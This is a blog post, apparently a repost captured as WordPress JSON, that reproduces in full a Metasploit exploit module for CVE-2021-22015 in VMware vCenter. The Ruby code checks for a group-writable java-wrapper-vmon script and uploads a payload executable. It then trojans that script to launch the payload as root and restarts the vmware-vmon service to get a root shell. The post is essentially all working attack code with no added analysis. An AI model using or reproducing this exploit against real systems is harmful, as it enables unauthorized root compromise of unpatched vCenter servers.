{"id":34478,"date":"2022-12-06T20:20:48","date_gmt":"2022-12-06T17:20:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170116\/vcenter_java_wrapper_vmon_priv_esc.rb.txt"},"modified":"2022-12-12T11:08:44","modified_gmt":"2022-12-12T07:38:44","slug":"vmware-vcenter-vscalation-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/vmware-vcenter-vscalation-privilege-escalation\/","title":{"rendered":"VMware vCenter vScalation Privilege Escalation"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Local
\nRank = ManualRanking<\/p>\n

include Msf::Post::Linux::Priv
\ninclude Msf::Post::File
\ninclude Msf::Exploit::EXE
\ninclude Msf::Exploit::FileDropper
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘VMware vCenter vScalation Priv Esc’,
\n‘Description’ => %q{
\nThis module exploits a privilege escalation in vSphere\/vCenter due to improper permissions on the
\n\/usr\/lib\/vmware-vmon\/java-wrapper-vmon file. It is possible for anyone in the
\ncis group to write to the file, which will execute as root on vmware-vmon service
\nrestart or host reboot.<\/p>\n

This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
\nThe following versions should be vulnerable:
\nvCenter 7.0 before U2c
\nvCenter 6.7 before U3o
\nvCenter 6.5 before U3q
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘h00die’, # msf module
\n‘Yuval Lazar’ # original PoC, analysis
\n],
\n‘Platform’ => [ ‘linux’ ],
\n‘Arch’ => [ ARCH_X86, ARCH_X64 ],
\n‘SessionTypes’ => [ ‘shell’, ‘meterpreter’ ],
\n‘Targets’ => [[ ‘Auto’, {} ]],
\n‘Privileged’ => true,
\n‘References’ => [
\n[ ‘URL’, ‘https:\/\/pentera.io\/blog\/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs\/’ ],
\n[ ‘CVE’, ‘2021-22015’ ],
\n[ ‘URL’, ‘https:\/\/www.vmware.com\/security\/advisories\/VMSA-2021-0020.html’ ]\n],
\n‘DisclosureDate’ => ‘2021-09-21’,
\n‘DefaultTarget’ => 0,
\n‘DefaultOptions’ => {
\n‘WfsDelay’ => 1800 # 30min
\n},
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SERVICE_DOWN],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘SideEffects’ => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],
\n‘AKA’ => [‘vScalation’]\n}
\n)
\n)
\nregister_advanced_options [
\nOptString.new(‘WritableDir’, [ true, ‘A directory where we can write files’, ‘\/tmp’ ])
\n]\nend<\/p>\n

# Simplify pulling the writable directory variable
\ndef base_dir
\ndatastore[‘WritableDir’].to_s
\nend<\/p>\n

def java_wrapper_vmon
\n‘\/usr\/lib\/vmware-vmon\/java-wrapper-vmon’
\nend<\/p>\n

def check
\ngroup_owner = cmd_exec(“stat -c \\”%G\\” \\”#{java_wrapper_vmon}\\””)
\nif writable?(java_wrapper_vmon) && group_owner == ‘cis’
\nreturn CheckCode::Appears(“#{java_wrapper_vmon} is writable and owned by cis group”)
\nend<\/p>\n

CheckCode::Safe(“#{java_wrapper_vmon} not owned by ‘cis’ group (owned by ‘#{group_owner}’), or not writable”)
\nend<\/p>\n

def exploit
\n# Check if we’re already root
\nif is_root? && !datastore[‘ForceExploit’]\nfail_with Failure::BadConfig, ‘Session already has root privileges. Set ForceExploit to override’
\nend<\/p>\n

# Make sure we can write our exploit and payload to the local system
\nunless writable? base_dir
\nfail_with Failure::BadConfig, “#{base_dir} is not writable”
\nend<\/p>\n

# backup the original file
\n@backup = read_file(java_wrapper_vmon)
\npath = store_loot(
\n‘java-wrapper-vmon.text’,
\n‘text\/plain’,
\nrhost,
\n@backup,
\n‘java-wrapper-vmon.text’
\n)
\nprint_good(“Original #{java_wrapper_vmon} backed up to #{path}”)<\/p>\n

# Upload payload executable
\npayload_path = “#{base_dir}\/.#{rand_text_alphanumeric(5..10)}”
\nprint_status(“Writing payload to #{payload_path}”)
\nupload_and_chmodx payload_path, generate_payload_exe
\nregister_files_for_cleanup payload_path<\/p>\n

# write trojaned file
\n# we want to write our payload towards the top to ensure it gets run
\n# writing it at the bottom of the file results in the payload not being run
\nprint_status(“Writing trojaned #{java_wrapper_vmon}”)
\nwrite_file(java_wrapper_vmon, @backup.gsub(‘#!\/bin\/sh’, “#!\/bin\/sh\\n#{payload_path} &\\n”))<\/p>\n

# try to restart the service
\nprint_status(‘Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)’)
\nservice_restart = cmd_exec(‘systemctl restart vmware-vmon.service’)
\n# one error i’m seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files
\nif service_restart.downcase.include?(‘access denied’) || service_restart.downcase.include?(‘failed’)
\nprint_bad(‘vmware-vmon service needs to be restarted, or host rebooted to obtain shell.’)
\nend
\nprint_status(“Waiting #{datastore[‘WfsDelay’]} seconds for shell”)
\nend<\/p>\n

def cleanup
\nunless @backup.nil?
\nprint_status(“Replacing trojaned #{java_wrapper_vmon} with original”)
\nwrite_file(java_wrapper_vmon, @backup)
\nend
\nsuper
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Post::Linux::Priv include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘VMware vCenter vScalation Priv Esc’, ‘Description’ => %q{ This module exploits a privilege escalation in vSphere\/vCenter due …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34478","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34478","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34478"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34478\/revisions"}],"predecessor-version":[{"id":34747,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34478\/revisions\/34747"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34478"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34478"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34478"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}